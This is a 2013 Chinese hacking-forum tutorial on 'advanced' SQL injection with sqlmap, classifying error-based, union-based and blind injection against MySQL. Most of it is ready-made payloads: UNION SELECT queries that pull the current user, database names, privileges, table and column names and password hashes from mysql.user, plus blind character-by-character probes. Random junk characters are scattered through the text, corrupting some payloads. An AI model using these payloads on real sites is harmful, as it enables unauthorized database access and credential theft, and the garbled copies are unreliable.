找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2120|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
: E' W! {9 M% ?0 O1 f $ D9 z! `( k5 Z5 z  f$ o% k
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表2 N" O, R% _/ @( K

! M, g$ v6 T. D0 t分类标准        分类        备注6 [# w3 J) s3 J+ B. G* h8 W
按字段类型        整型注入,字符型注入       
) ]$ _1 W. z$ a& r按出现的位置        get注入,post注入,cookie注入,http header注入       
, d) Q' z1 ]- T1 O& q然而高级注入是这样的3 ?3 j6 e8 r3 \$ x7 g  t! `$ _

# G/ N2 F' c: p- M* K) {" s高级注入分类        条件
  |* n5 ^9 r4 E/ Yerror-based sql        数据库的错误回显可以返回,存在数据库,表结构6 H" x  \) g6 U3 i
union-based sql        能够使用union,存在数据库,表结构
3 _9 m4 F1 x6 [) p, G' C, V2 vblind sql        存在注入& O( Z: `1 c7 }% D
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
. G/ {1 R) {( l* a) W" u 9 C4 a: W7 l% {0 u) Q
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
( X& g! O% P- V5 m
) [& x% _) f8 H! G4 g附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
# X; f( F3 G: t& _ , S% A& h, ^8 U0 j5 r. H7 m
这里用mysql说明
' A" U  S8 L9 w8 l* @: O 9 Y9 b( h; |* Z8 i; f
e注入坛子里很多了,请看戳我或者再戳我# y& ~8 k( D/ R4 n/ ]( H  V3 k
% V8 q' y+ I% q* v/ b* {
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的* P  P' q; P& ^' f( @
7 ?2 S& S8 d& |. @7 p
获取当前数据库用户名
/ n- ~2 J" h4 B7 ]- c9 { ) K- Q$ c$ L) E" K
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C7 a5 j, f9 K, k1 L
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL0 S9 d6 ^% Y) f- i
L, NULL#
( Z  n( C0 u( l  J' s" H注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
; @& E2 J6 Z8 w9 j  ?, |4 b
! G7 H/ L. f+ T4 c" C* n获取数据库名( N7 K" H: B3 a) ?

+ O5 p' e0 }" Y  r  c; zUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
  t$ V6 J+ v# w& v9 j. y6 \1 |: w获取所有用户名3 q; b0 H, U2 z4 e& E1 O
" {- ~! B3 [9 F
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
: L( r0 t' \( f$ f! f9 m5 y查看当前用户权限
  |# F2 F0 x5 N  L+ Q' r6 H ( w4 H) t4 o: N; z1 m% ?7 @
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#8 R  Z: ]  b+ D8 a0 ]
尝试获取密码,当然需要有能读mysql数据库的权限' f. Y" b8 R) U- ^& U2 F! T" C

; H1 b. i% u) Q: q( D5 C% EUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#  v3 @$ z  T, h, i, ^
获取表名,limit什么的自己搞啦+ p2 ^* U6 A+ R/ Q5 r. Y' p9 a  n- T

# k1 m' L' C$ w  L" m7 iUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#$ n- V. d  ^1 I9 y
获取字段名及其类型
0 q- |) |! F: f! m6 j5 DUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#% I2 M. e6 o; t

: ^/ J) |( o( w8 m8 A, V6 tb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。7 C( k4 Y" g6 h# r' D* U5 [$ ~. e

! w) ]- T7 m& h. s2 X/ W  g5 H如:8 I* K$ v2 A2 W" A3 U: Q
获取当前用户名' V% F) N, ^, W7 Q3 r* H/ m

; P% |! v& x% l1 n8 ^8 o7 pAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
- I- f+ C' ]9 y获取当前数据库
2 L$ z3 y9 }" ` 3 W' Y! x4 U2 K# z$ g4 q6 B
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106% Z! B. C, k* f
获取表名. T. ^* ]3 ^" X! Q9 C9 e8 D) F
! p5 R0 G( m+ T$ D8 Q
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51  e4 e9 u# s. b: g( t
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
- M' }! K) [% |回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。* K; b2 F* G" y( [& Q+ Y
爆表
8 D% {0 w3 j$ s: w/ x' P  f6 H 7 f" A' y" s% X& c* i
AND EXISTS(select * from table)* B+ E8 q" F7 w+ ]% t
爆字段
/ A4 o6 e' M* M: R 4 j. q7 c" d2 z" D
AND EXISTS(select pwd from table)
( M  O& m( K' e! d, c盲注的变化就比较多了,由于篇幅,只是举个例子而已。$ ?. ]# E: [* e4 D3 `3 {6 m3 G* C9 b
* q: W9 `4 y0 |: l+ n) _; V( G: p
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。8 `+ T0 r4 R) m0 v0 M( F8 _" x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表